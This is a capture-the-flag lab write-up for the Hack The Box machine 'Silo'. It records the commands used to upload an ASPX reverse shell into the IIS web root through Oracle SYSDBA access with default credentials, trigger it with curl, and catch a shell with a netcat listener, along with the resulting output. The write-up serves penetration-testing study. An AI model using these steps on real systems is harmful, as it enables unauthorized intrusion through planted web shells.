InfoSec LAB

Silo_Exploitation

Created: 2 min read

Exploitation

The machine has been technically pwned already by planting a reverse shell and having the machine execute it with the SYSTEM privilege as OracleDB runs with that.

However, I will try to get to the SYSTEM through the low privileged user via the web service.

Based on the enumeration earlier, I would conclude that the the web server has never been touched. it’s likely a fresh installation where the web root is located at c:\inetpub\www

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat utlfile -s $ip -u scott -p tiger -d xe --sysdba --putfile 'c:\inetpub\wwwroot\' backdoor.aspx /home/kali/archive/htb/labs/silo/backdoor.aspx

[1] (10.10.10.82:1521): Put the /home/kali/archive/htb/labs/silo/backdoor.aspx local file in the C:\inetpub\wwwroot\ folder like backdoor.aspx on the 10.10.10.82 server
[+] the /home/kali/archive/htb/labs/silo/backdoor.aspx file was created on the c:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the backdoor.aspx file

I will upload a ASPX reverse shell there through the Oracle DB since I have a SYSDBA credential Upload is successful

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ curl http://$IP/backdoor.aspx

Invoking the planted ASPX reverse shell with curl

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49166
Windows PowerShell running as user SILO$ on SILO
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
ps c:\windows\system32\inetsrv> hostname
SILO
ps c:\windows\system32\inetsrv> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.82
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{50cd6e47-e5c7-44a8-b294-ba01e18b9e30}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

Initial Foothold Established as iis apppool\defaultapppool

Interactive Graph View

Backlinks